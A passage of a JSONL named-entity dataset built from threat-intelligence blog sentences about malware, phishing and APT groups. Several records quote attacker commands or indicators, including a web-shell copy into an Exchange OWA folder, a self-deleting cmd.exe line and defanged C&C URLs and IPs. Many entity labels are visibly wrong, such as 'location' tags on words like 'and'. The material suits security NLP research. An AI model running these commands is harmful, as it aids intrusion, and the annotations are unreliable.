exploits lead us to believe they were written by the same actor or group.","entities":[],"relations":[],"Comments":[]} {"id":13577,"text":"The script to create and delete fake login form for credential phishing The other approach involves showing an authorization error message and then redirecting the user to a phishing website that asks users to enter their credentials.","entities":[{"id":51659,"label":"attack-pattern","start_offset":178,"end_offset":186},{"id":51658,"label":"attack-pattern","start_offset":52,"end_offset":71}],"relations":[],"Comments":[]} {"id":114,"text":"From there, you can work backwards to develop your strategy for protecting those initial access areas tied to the different attacks.","entities":[],"relations":[],"Comments":[]} {"id":13688,"text":"The email in question is an invoice request that has a legitimate email header, which is a known tactic used in BEC scams.","entities":[{"id":51753,"label":"attack-pattern","start_offset":112,"end_offset":121}],"relations":[],"Comments":[]} {"id":752,"text":"This mechanism prevents precise control of the data of a freed object from further exploitation.","entities":[],"relations":[],"Comments":[]} {"id":3214,"text":"At the time of our research into this threat, only the \u201cprint(1)\u201d command is able to be executed.","entities":[],"relations":[],"Comments":[]} {"id":14365,"text":"Countermeasures","entities":[],"relations":[],"Comments":[]} {"id":1511,"text":" There exist two embedded zlib-encrypted blocks at file offset 0x8C0C0 and 0xE6B40 respectively.","entities":[{"id":4493,"label":"tools","start_offset":26,"end_offset":30}],"relations":[],"Comments":[]} {"id":6822,"text":"Trend Micro\u2122 Hosted Email Securityis a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":21211,"label":"location","start_offset":54,"end_offset":59},{"id":21212,"label":"location","start_offset":104,"end_offset":114},{"id":21213,"label":"malware","start_offset":118,"end_offset":122},{"id":21214,"label":"attack-pattern","start_offset":138,"end_offset":152},{"id":21215,"label":"location","start_offset":166,"end_offset":169}],"relations":[],"Comments":[]} {"id":2027,"text":"While the obfuscation and execution may differ between the two, both samples contain very similar core functionality, due to the author copying the leaked Babuk\/Babyk source code in order to develop the HelloXD ransomware (Figure 7).","entities":[{"id":47122,"label":"malware","start_offset":203,"end_offset":210},{"id":47121,"label":"malware","start_offset":161,"end_offset":166},{"id":47120,"label":"malware","start_offset":155,"end_offset":160}],"relations":[{"id":303,"from_id":47121,"to_id":47122,"type":"variant-of"},{"id":304,"from_id":47120,"to_id":47122,"type":"variant-of"}],"Comments":[]} {"id":4607,"text":" Using the Trend Micro Vision One Workbench, you can easily see what threats were detected, attack techniques, and a prioritized list of risky devices and users.","entities":[{"id":50508,"label":"SOFTWARE","start_offset":11,"end_offset":43}],"relations":[],"Comments":[]} {"id":3279,"text":"The malicious actor can then connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} {"id":10341,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":7331,"text":"nha","entities":[],"relations":[],"Comments":[]} {"id":3690,"text":"To elevate privileges, the groups bypass Windows User Account Control (UAC) mechanisms, new services, and valid accounts to elevate process privileges.","entities":[{"id":49482,"label":"attack-pattern","start_offset":34,"end_offset":75}],"relations":[],"Comments":[]} {"id":14396,"text":"In the game of measure-countermeasure that is cybersecurity today and tomorrow, XDR is the next evolutionary step in dealing with more evasive threats.","entities":[{"id":51774,"label":"SOFTWARE","start_offset":80,"end_offset":83}],"relations":[],"Comments":[]} {"id":4779,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations \u2013 in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} {"id":107,"text":"This use of known, legitimate tools is not new; we call that \u201cliving off the land\u201d and have seen this tactic pick up recently, including usage by ransomware actors.","entities":[{"id":45838,"label":"tools","start_offset":62,"end_offset":81}],"relations":[],"Comments":[]} {"id":8254,"text":"DiscoveryOur first inkling of this threat came when we spotted a spear-phishing email campaign targeting several embassies of various European countries.","entities":[{"id":25489,"label":"location","start_offset":65,"end_offset":70},{"id":25490,"label":"attack-pattern","start_offset":71,"end_offset":79},{"id":25491,"label":"location","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} {"id":3137,"text":"Attackers use them to take down websites for several reasons: About Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} {"id":4233,"text":"After impersonating a fake victim of interest, we obtained a second stage payload (Detected as TROJ_DELF.XXWZ), which is a filestealer based on the Delphi programming language similar to the \u201csvctrls\u201d malware described in our previous blogpost.","entities":[{"id":50043,"label":"malware","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} {"id":3004,"text":"All apps like those from Netflix, Amazon, Hulu and others have their own passwords to connect to their service, and attackers crack and sell compromised accounts to these services.","entities":[{"id":48120,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":48119,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":48121,"label":"SOFTWARE","start_offset":42,"end_offset":46}],"relations":[],"Comments":[]} {"id":4088,"text":"While the Windows service \u201cIKEEXT\u201d is starting, the fake wlbsctrl.dll is loaded and executed with high privilege.","entities":[],"relations":[],"Comments":[]} {"id":3532,"text":"Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions.","entities":[],"relations":[],"Comments":[]} {"id":1693,"text":"Security awareness is critical to avoid falling victim to such an attack.","entities":[],"relations":[],"Comments":[]} {"id":2207,"text":" In total, the following 14 functions are loaded during runtime: ","entities":[],"relations":[],"Comments":[]} {"id":2999,"text":"When we think about home entertainment, there\u2019s really two things you need to think about with security.","entities":[],"relations":[],"Comments":[]} {"id":2825,"text":"One thing reports have indicated that make this attack unique is a \u201ckillswitch\u201d capability built into the malware.","entities":[],"relations":[],"Comments":[]} {"id":3728,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":7128,"text":"We found three new samples of the Type 1 malware family that abuses Dropbox as a secondary C&C channel, which we described in our Operation DRBControl whitepaper.","entities":[{"id":22294,"label":"location","start_offset":34,"end_offset":38},{"id":22295,"label":"malware","start_offset":68,"end_offset":75}],"relations":[],"Comments":[]} {"id":1138,"text":" However, this particular mutex was associated with only a recent subset of the Allaple family.","entities":[{"id":46572,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} {"id":10946,"text":" SHA256 Description","entities":[],"relations":[],"Comments":[]} {"id":7536,"text":"For the PowerShell script, the first part contains a variable named dragon_middle, which is an array containing a few hundred URLs ending with connection.php that serve as proxies between victim and C&C.","entities":[{"id":23403,"label":"attack-pattern","start_offset":8,"end_offset":18},{"id":23406,"label":"location","start_offset":180,"end_offset":187},{"id":23407,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} {"id":1191,"text":"However, an increasingly popular method uses premium SMS.","entities":[],"relations":[],"Comments":[]} {"id":9916,"text":"simsoshop.com","entities":[],"relations":[],"Comments":[]} {"id":13916,"text":"It also uses this information to determine the amount of ransom to demand, with a typical ransom demand amounting to anywhere between US$200,000 and US$2 million.","entities":[],"relations":[],"Comments":[]} {"id":13044,"text":"Delivered as part of its industry-leading platform, Cloud One \u2013 Application Security provides code-level visibility and protection against the latest cyber threats.","entities":[],"relations":[],"Comments":[]} {"id":4536,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50330,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50331,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} {"id":10756,"text":"Snapshots of Daserf\u2019s steganographic code generated by their toolkit MitigationSteganography is a particularly useful technique in purposeful cyberattacks: the longer their malicious activities stay undetected, the more they can steal and exfiltrate data.","entities":[{"id":32875,"label":"tools","start_offset":13,"end_offset":19},{"id":32876,"label":"location","start_offset":225,"end_offset":228},{"id":32877,"label":"location","start_offset":235,"end_offset":238}],"relations":[],"Comments":[]} {"id":1498,"text":"The terms remote administration tool (RAT) and trojan downloader are often used synonymously with such implants.","entities":[],"relations":[],"Comments":[]} {"id":13987,"text":"XDR fills in those gaps.","entities":[{"id":48777,"label":"SOFTWARE","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":6014,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":18560,"label":"location","start_offset":102,"end_offset":107},{"id":18561,"label":"location","start_offset":131,"end_offset":135},{"id":18562,"label":"attack-pattern","start_offset":182,"end_offset":190}],"relations":[],"Comments":[]} {"id":1777,"text":"One such module leverages the fact that the length of a vector object is always consistent with memory allocation, which means we can deduce the memory usage from the sum of the length of all allocated vectors.","entities":[],"relations":[],"Comments":[]} {"id":14150,"text":"Gone are the days in which these attacks only target the endpoint, and as such, an expanded connected threat defense is paramount.","entities":[],"relations":[],"Comments":[]} {"id":11396,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[],"relations":[],"Comments":[]} {"id":795,"text":"Time will tell.","entities":[],"relations":[],"Comments":[]} {"id":5058,"text":"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.","entities":[{"id":51163,"label":"SOFTWARE","start_offset":46,"end_offset":51}],"relations":[],"Comments":[]} {"id":2043,"text":"Querying VirusTotal with this string led to the discovery of eight files, six of which could be directly attributed to x4k through their own VirusTotal graph mapping out their infrastructure.","entities":[{"id":45229,"label":"SOFTWARE","start_offset":9,"end_offset":19},{"id":45230,"label":"threat-actor","start_offset":119,"end_offset":122},{"id":45231,"label":"SOFTWARE","start_offset":141,"end_offset":151}],"relations":[],"Comments":[]} {"id":2730,"text":"Upgrade Cortex XDR and Traps agents for protection against this vulnerability regardless of whether your systems have installed the relevant security update from Microsoft.","entities":[{"id":45677,"label":"SOFTWARE","start_offset":8,"end_offset":18},{"id":45678,"label":"identity","start_offset":162,"end_offset":171}],"relations":[],"Comments":[]} {"id":2760,"text":"The good news is that this vulnerability was disclosed responsibly and patches are available for most platforms on the day of the public disclosure.","entities":[],"relations":[],"Comments":[]} {"id":635,"text":" After the system is compromised the victim is asked to send US $300 in Bitcoin to a specific Bitcoin address and then send an e-mail with the victim\u2019s bitcoin wallet ID to wowsmith123456@posteo[.]net to retrieve their individual decryption key.","entities":[{"id":46226,"label":"SOFTWARE","start_offset":94,"end_offset":101},{"id":46224,"label":"EMAIL","start_offset":173,"end_offset":200},{"id":46225,"label":"SOFTWARE","start_offset":72,"end_offset":79}],"relations":[],"Comments":[]} {"id":13180,"text":" The decoy file first drops a flash_en.inf DLL file, which is a USBferry loader, and tries to load the encrypted USBferry malware","entities":[{"id":41126,"label":"location","start_offset":5,"end_offset":10},{"id":41127,"label":"tools","start_offset":64,"end_offset":72},{"id":41128,"label":"location","start_offset":81,"end_offset":84},{"id":41129,"label":"location","start_offset":94,"end_offset":98},{"id":41130,"label":"malware","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} {"id":14330,"text":"Figure 17.","entities":[],"relations":[],"Comments":[]} {"id":9917,"text":"6\/2\/16","entities":[],"relations":[],"Comments":[]} {"id":13472,"text":"We continue to see attacks from groups like Charming Kitten on medical and healthcare professionals, including World Health Organization (WHO) employees.","entities":[{"id":51544,"label":"threat-actor","start_offset":44,"end_offset":59},{"id":51545,"label":"identity","start_offset":111,"end_offset":142}],"relations":[{"id":1101,"from_id":51544,"to_id":51545,"type":"targets"}],"Comments":[]} {"id":12341,"text":"We haven\u2019t seen any evidence of such attempts being successful.","entities":[],"relations":[],"Comments":[]} {"id":2251,"text":"The following commands are supported: Once again, using the previous example, the malware will first ensure that the command was not previously parsed\/executed.","entities":[],"relations":[],"Comments":[]} {"id":13805,"text":"If yes, it modifies the process ID, which should open on another Windows Service PID.","entities":[],"relations":[],"Comments":[]} {"id":1127,"text":" Full automation is always the ideal but it isn\u2019t always necessary.","entities":[],"relations":[],"Comments":[]} {"id":11966,"text":"We terminated 123 YouTube channels as part of our investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} {"id":14157,"text":"The X could be network data, email or web data, data from cloud instances, and others.","entities":[],"relations":[],"Comments":[]} {"id":3314,"text":"Additional Findings on BIOPASS RAT ","entities":[{"id":10040,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} {"id":6243,"text":"Based on the number of \u201clikes\u201d the malware had generated, Faghani estimated that over 100,000 users had been infected with the malware.","entities":[],"relations":[],"Comments":[]} {"id":3936,"text":"copy premium.aspx \"\\\\{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium","entities":[{"id":49778,"label":"FILEPATH","start_offset":19,"end_offset":132},{"id":49779,"label":"FILEPATH","start_offset":5,"end_offset":17}],"relations":[],"Comments":[]} {"id":14348,"text":"The next variant appeared quickly, and it added the following abilities to its routines: Steal information about the device\u2019s clipboard, phone number, installed app list, and accounts.","entities":[],"relations":[],"Comments":[]} {"id":14064,"text":" Another surprising similarity in the TTPs related to both campaigns is the path pointing to \u201cudel_ok.ipp,\u201d as shown in Figure 7.","entities":[{"id":47241,"label":"FILEPATH","start_offset":93,"end_offset":107}],"relations":[],"Comments":[]} {"id":5815,"text":"So cyber is still critical as we become more hyper-connected.","entities":[],"relations":[],"Comments":[]} {"id":4451,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50228,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":607,"text":" To do this, they make the spam look like something that requires you to click and download something like and invoice, a message, or a delivery notification.","entities":[],"relations":[],"Comments":[]} {"id":5432,"text":"It\u2019s also important to set reminders to check if devices such as routers, cameras, network-attached storage (NAS) devices, and other IoT devices have been patched or otherwise.","entities":[],"relations":[],"Comments":[]} {"id":11496,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":35161,"label":"threat-actor","start_offset":4,"end_offset":12},{"id":35162,"label":"location","start_offset":13,"end_offset":21},{"id":35164,"label":"location","start_offset":154,"end_offset":159}],"relations":[],"Comments":[]} {"id":9455,"text":"Stage 3: BasicLoader","entities":[],"relations":[],"Comments":[]} {"id":1709,"text":"CryptoWall is one of multiple ransomware families that generated income for the attacker by encrypting files on the infected PC with a private key that is in the control of the attacker.","entities":[{"id":5075,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":12566,"text":"In contrast, a 0-day is a vulnerability with no available patch which makes it harder to defend against.","entities":[],"relations":[],"Comments":[]} {"id":11754,"text":"During the pandemic, we also uncovered attackers posing as news providers with a \u201cCovid19 news software.\u201d","entities":[],"relations":[],"Comments":[]} {"id":11337,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} {"id":14131,"text":"The \u201cX\u201d axis represents the hour of the day (in 24 hours).","entities":[],"relations":[],"Comments":[]} {"id":2157,"text":"Then the code loops through the files within a .rar archive looking for a CAB file (TVNDRgAAAA base64 decodes to MSCF, which is the magic header of a CAB file).","entities":[],"relations":[],"Comments":[]} {"id":3694,"text":"After a series of malicious behavior, attackers need to remain stealthy and undetected by using security solutions that can remove threats out of the system.","entities":[],"relations":[],"Comments":[]} {"id":5397,"text":"This is in line with the increasing number of brute-force attacks performed by other APT groups such as Pawn Storm, a group that has compromised numerous assets like email addresses and email servers of targets that are typically not aligned with Pawn Storm\u2019s objectives.","entities":[{"id":51395,"label":"threat-actor","start_offset":104,"end_offset":114},{"id":51396,"label":"threat-actor","start_offset":247,"end_offset":257}],"relations":[],"Comments":[]} {"id":235,"text":"We detected 11,637 cybersquatting newly registered domains (NRDs) during February and March.","entities":[{"id":45935,"label":"TIME","start_offset":73,"end_offset":81},{"id":45936,"label":"TIME","start_offset":86,"end_offset":91}],"relations":[],"Comments":[]} {"id":12910,"text":"Technique: A detection on technique means the detection can be attributed to a specific adversarial action (e.g. credential dumping).","entities":[{"id":40191,"label":"location","start_offset":36,"end_offset":41},{"id":40192,"label":"location","start_offset":56,"end_offset":59},{"id":40193,"label":"location","start_offset":100,"end_offset":106},{"id":40194,"label":"attack-pattern","start_offset":113,"end_offset":131}],"relations":[],"Comments":[]} {"id":3786,"text":" Latest News | Exploits & Vulnerabilities | Cyber Threats | Connected Car | APT & Targeted Attacks | Endpoints | IoT | Video","entities":[],"relations":[],"Comments":[]} {"id":834,"text":" One key thing that research into these security incidents shows is that these attacks used a relatively new and unknown technique called kernel APC attacks as part of their toolkit.","entities":[{"id":44878,"label":"attack-pattern","start_offset":138,"end_offset":156}],"relations":[],"Comments":[]} {"id":6794,"text":"Connect with \u201chxxp:\/\/ kristom[.]hopto[.]org \/{computer name}_{hexadecimal volume serious number}\/help_05_03[.]php\u201d (MITRE ATT&CK framework IDs T1043, T1071, T1082)","entities":[],"relations":[],"Comments":[]} {"id":3732,"text":" Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18.","entities":[{"id":49537,"label":"TIME","start_offset":117,"end_offset":135},{"id":49538,"label":"identity","start_offset":159,"end_offset":163},{"id":49539,"label":"TIME","start_offset":173,"end_offset":179}],"relations":[],"Comments":[]} {"id":400,"text":" Existing Xpanse customers can log into Expander and identify their enumerated Atlassian Confluence devices by filtering by \u201cAtlassian Confluence Server\u201d in the Services tab.","entities":[{"id":46099,"label":"SOFTWARE","start_offset":10,"end_offset":16},{"id":46101,"label":"SOFTWARE","start_offset":125,"end_offset":152},{"id":46100,"label":"SOFTWARE","start_offset":79,"end_offset":99}],"relations":[],"Comments":[]} {"id":13145,"text":"Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4685,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} {"id":3064,"text":" Figure 4 Hard-coded fake threat detection results ","entities":[],"relations":[],"Comments":[]} {"id":6388,"text":" After validating that badger_x64.exe and OneDrive.Update were both BRc4 payloads, we set to work analyzing the employment of this second sample.","entities":[{"id":19807,"label":"location","start_offset":38,"end_offset":41},{"id":19808,"label":"tools","start_offset":68,"end_offset":72},{"id":19810,"label":"location","start_offset":138,"end_offset":144}],"relations":[],"Comments":[]} {"id":13360,"text":"The C&C server 104[.]233[.]224[.]227 was hosted under a small hosting service with only 64 IPs under it.","entities":[{"id":41555,"label":"IPV4","start_offset":15,"end_offset":36},{"id":41556,"label":"location","start_offset":56,"end_offset":61}],"relations":[],"Comments":[]} {"id":7041,"text":"Windows Management Instrumentation (WMI) will be used to run dlpumgr32.exe with arguments \u201c-up -run -x\u201d and it will exit the current process.","entities":[{"id":22079,"label":"attack-pattern","start_offset":0,"end_offset":34},{"id":22080,"label":"location","start_offset":41,"end_offset":45},{"id":22081,"label":"location","start_offset":104,"end_offset":107},{"id":22082,"label":"location","start_offset":111,"end_offset":115}],"relations":[],"Comments":[]} {"id":12994,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":40471,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":40473,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} {"id":7689,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":198,"text":"On Feb. 15, the Cyberpolice of Ukraine reported that residents were actively receiving fake SMS text messages.","entities":[{"id":45894,"label":"TIME","start_offset":3,"end_offset":10},{"id":44614,"label":"identity","start_offset":16,"end_offset":38},{"id":44615,"label":"attack-pattern","start_offset":77,"end_offset":109}],"relations":[],"Comments":[]} {"id":1406,"text":"In this case the e-mails claim to contain a document about a court case.","entities":[],"relations":[],"Comments":[]} {"id":2644,"text":" In some cases, LockBit 2.0 operators have performed DDoS attacks on the victims' infrastructure as well as using a leak site.","entities":[{"id":47831,"label":"malware","start_offset":16,"end_offset":27},{"id":47832,"label":"attack-pattern","start_offset":53,"end_offset":65}],"relations":[],"Comments":[]} {"id":4163,"text":"We found some special mutexes that are encoded by the layout of the Chinese Zhuyin keyboard in ChiserClient.","entities":[{"id":49969,"label":"malware","start_offset":95,"end_offset":107}],"relations":[],"Comments":[]} {"id":4272,"text":"Some of these samples were several years old and had left the original name of the bit-flip decryption algorithm, which was \u201cEnDecrypt\u201d.","entities":[],"relations":[],"Comments":[]} {"id":1567,"text":"This Unit 42 blog post provides an update on the threat situation surrounding the Bad Rabbit ransomware attacks.","entities":[{"id":4684,"label":"identity","start_offset":5,"end_offset":12},{"id":4686,"label":"malware","start_offset":82,"end_offset":92}],"relations":[],"Comments":[]} {"id":2004,"text":" cmd.exe \/C ping 1.1.1[.]1 -n 1 -w 3000 > Nul & Del \/f \/q \"C:\\Users\\admin\\Desktop\\xd.exe\"","entities":[{"id":45219,"label":"FILEPATH","start_offset":59,"end_offset":88},{"id":45220,"label":"FILEPATH","start_offset":1,"end_offset":8},{"id":5931,"label":"tools","start_offset":12,"end_offset":16},{"id":5932,"label":"IPV4","start_offset":17,"end_offset":26}],"relations":[],"Comments":[]} {"id":5226,"text":"Android malware like ransomware exemplify how the platform can be lucrative for cybercriminals.","entities":[{"id":51259,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":3436,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388.","entities":[{"id":49195,"label":"vulnerability","start_offset":206,"end_offset":219},{"id":49196,"label":"vulnerability","start_offset":107,"end_offset":142},{"id":49193,"label":"TIME","start_offset":53,"end_offset":67},{"id":49194,"label":"identity","start_offset":69,"end_offset":71},{"id":49197,"label":"tools","start_offset":150,"end_offset":162}],"relations":[{"id":750,"from_id":49196,"to_id":49195,"type":"duplicate-of"},{"id":751,"from_id":49197,"to_id":49195,"type":"has"}],"Comments":[]} {"id":3931,"text":"expand {filename}.ex_ {filename}.dat expand {filename}.ex_ {filename}.exe","entities":[],"relations":[],"Comments":[]} {"id":567,"text":"Figure 6 is a screenshot of a recently captured Virlock ransom note.","entities":[{"id":44781,"label":"malware","start_offset":48,"end_offset":55}],"relations":[],"Comments":[]} {"id":10514,"text":"To help protect users against these kinds of tracks, our Advanced Protection Program (APP) utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":31984,"label":"location","start_offset":66,"end_offset":76},{"id":31985,"label":"location","start_offset":109,"end_offset":117},{"id":31986,"label":"location","start_offset":123,"end_offset":126},{"id":31987,"label":"attack-pattern","start_offset":180,"end_offset":188},{"id":31988,"label":"location","start_offset":189,"end_offset":192}],"relations":[],"Comments":[]} {"id":13761,"text":"Offset 0xAC, Size 0x02: Port Offset 0xAE, Size 0x5A: Reserved bytes Table:","entities":[],"relations":[],"Comments":[]} {"id":11693,"text":"af[.]org","entities":[],"relations":[],"Comments":[]} {"id":10401,"text":"Connect to the C&C server every 10 seconds to download, save, and execute script files containing the commands.","entities":[{"id":31646,"label":"TIME","start_offset":26,"end_offset":42},{"id":31647,"label":"location","start_offset":56,"end_offset":60},{"id":31648,"label":"location","start_offset":62,"end_offset":65}],"relations":[],"Comments":[]} {"id":3772,"text":"Presently, customers may leverage the following to block or detect the threats communicated throughout this publication:","entities":[],"relations":[],"Comments":[]} {"id":11530,"text":"Russia","entities":[],"relations":[],"Comments":[]} {"id":2595,"text":"This included the soon-to-be de rigueur data exfiltration and deletion technique, and also redirection of some DNS records.","entities":[],"relations":[],"Comments":[]} {"id":7653,"text":"Using Kronos and SmokeLoader (v2019) TA505 previously used Amadey to distribute the FlawedAmmyy downloader before, so the use of Kronos and SmokeLoader can\u2019t be considered strong evidence of false attribution.","entities":[{"id":23802,"label":"location","start_offset":13,"end_offset":16},{"id":23803,"label":"malware","start_offset":17,"end_offset":28},{"id":23808,"label":"location","start_offset":136,"end_offset":139},{"id":23810,"label":"location","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} {"id":4842,"text":"Some hack-for-hire attackers openly advertise their products and services to anyone willing to pay, while others operate more discreetly selling to a limited audience.","entities":[{"id":50798,"label":"attack-pattern","start_offset":5,"end_offset":18}],"relations":[],"Comments":[]} {"id":3827,"text":"Set QWORD Value {Variable}.registry.write Write\/Add Registry {Variable}.registry.provider Create Registry Handle {Variable}.registry.destroy Deletes Registry Key {Variable}.registry.read Get\/Read Registry Entries {Variable}.WMI WMI-related functions {","entities":[],"relations":[],"Comments":[]} {"id":224,"text":"Figure 8 shows that the number of Ukraine-related phishing\/scam sites is currently continuing to rise about a month after the \u201cUkraine aid\u201d search term started trending in Google search.","entities":[{"id":747,"label":"attack-pattern","start_offset":50,"end_offset":58},{"id":45924,"label":"attack-pattern","start_offset":59,"end_offset":69},{"id":45926,"label":"location","start_offset":34,"end_offset":41},{"id":45927,"label":"SOFTWARE","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} {"id":5032,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} {"id":322,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":5546,"text":"Unfortunately, there\u2019s nothing obvious that differentiates a website infected with Magecart from any other site.","entities":[{"id":51539,"label":"malware","start_offset":83,"end_offset":91}],"relations":[],"Comments":[]} {"id":743,"text":"This year Microsoft has already patched 126 IE vulnerabilities to date.","entities":[{"id":46335,"label":"identity","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":201,"text":"These attacks impacted Ukrainian government organizations including the Ministry of Defense, Ministry of Foreign Affairs, Armed Forces of Ukraine and the publicly funded broadcaster Ukrainian Radio.","entities":[{"id":44616,"label":"identity","start_offset":23,"end_offset":43},{"id":44617,"label":"identity","start_offset":72,"end_offset":91},{"id":44618,"label":"identity","start_offset":93,"end_offset":120},{"id":44619,"label":"identity","start_offset":122,"end_offset":145},{"id":44620,"label":"identity","start_offset":182,"end_offset":197}],"relations":[],"Comments":[]} {"id":2597,"text":"This initial focus has led to speculation that Lapsus$ Group may be Brazilian, although we understand the choice of targets to have been influenced by extended team members rather than the team leadership.","entities":[{"id":47788,"label":"threat-actor","start_offset":47,"end_offset":54},{"id":47789,"label":"location","start_offset":68,"end_offset":77}],"relations":[{"id":356,"from_id":47788,"to_id":47789,"type":"located-at"}],"Comments":[]} {"id":14226,"text":"How is GitHub abused?","entities":[{"id":48412,"label":"SOFTWARE","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":813,"text":" Ignite '17 Security Conference: Vancouver, BC June 12\u201315, 2017 Ignite '17 Security Conference is a live, four-day conference designed for today\u2019s security professionals.","entities":[{"id":46365,"label":"TIME","start_offset":47,"end_offset":63},{"id":46366,"label":"location","start_offset":33,"end_offset":46}],"relations":[],"Comments":[]} {"id":13995,"text":"Recently, we uncovered the Operation Earth Kitsune campaign and published a detailed analysis of its tactics, techniques, and procedures (TTPs).","entities":[{"id":48780,"label":"campaign","start_offset":27,"end_offset":50}],"relations":[],"Comments":[]} {"id":13852,"text":"Updated May 17, 2021, 3:25 a.m. Eastern Time:","entities":[{"id":42957,"label":"TIME","start_offset":22,"end_offset":44}],"relations":[],"Comments":[]} {"id":7247,"text":"The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.","entities":[],"relations":[],"Comments":[]} {"id":6164,"text":"Appending their malicious script to the victim\u2019s email signature to propagate the infection to their contacts.","entities":[],"relations":[],"Comments":[]} {"id":7375,"text":"head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","entities":[],"relations":[],"Comments":[]} {"id":12637,"text":".pptx .pst .rar .sh .sql .txt .xls .xlsx .xml .zip","entities":[],"relations":[],"Comments":[]} {"id":5587,"text":" Figure 5. Infected Linux device connected to a C&C server ","entities":[],"relations":[],"Comments":[]} {"id":477,"text":"New anti-DGA technologies that leverage machine learning and big data are capable of countering DGA\u2019s automation with automated prediction of their own that can anticipate, block, assist with malicious site takedowns or even, in some cases, prevent those malicious sites from being used in the first place.","entities":[],"relations":[],"Comments":[]} {"id":13267,"text":"TClient is injected into dllhost.exe Malware Analysis wab32res.dll (FakeRun loader) loads TClient.","entities":[{"id":41339,"label":"malware","start_offset":0,"end_offset":7},{"id":41340,"label":"malware","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} {"id":149,"text":"The most common way ransomware operators levy attacks is through email or by web browsing to malicious or compromised sites.","entities":[{"id":45848,"label":"attack-pattern","start_offset":65,"end_offset":123}],"relations":[],"Comments":[]} {"id":6807,"text":" Network destination for template injection: 176[.]119[.]147[.]225 Network destination for VBS: 176[.]57[.]215[.]115 These IP addresses are from Russian hosting companies.","entities":[{"id":21172,"label":"IPV4","start_offset":45,"end_offset":66},{"id":21173,"label":"IPV4","start_offset":96,"end_offset":116},{"id":21174,"label":"location","start_offset":137,"end_offset":140}],"relations":[],"Comments":[]} {"id":11099,"text":"As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns.","entities":[{"id":33895,"label":"location","start_offset":65,"end_offset":69},{"id":33896,"label":"attack-pattern","start_offset":77,"end_offset":93}],"relations":[],"Comments":[]} {"id":523,"text":"Web hosting ransomware can also be downloaded and successfully installed through a multi-layered infection chain among different file types.","entities":[{"id":46150,"label":"attack-pattern","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} {"id":3658,"text":"Among these cybercriminals are financially motivated threat groups Carbanak and FIN7.","entities":[{"id":49428,"label":"threat-actor","start_offset":80,"end_offset":84},{"id":49427,"label":"threat-actor","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":13292,"text":"Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":1119,"text":"This results in a few hundred thousand individual mutexes available for further analysis.","entities":[],"relations":[],"Comments":[]} {"id":4756,"text":"Across all Google products, we incorporate 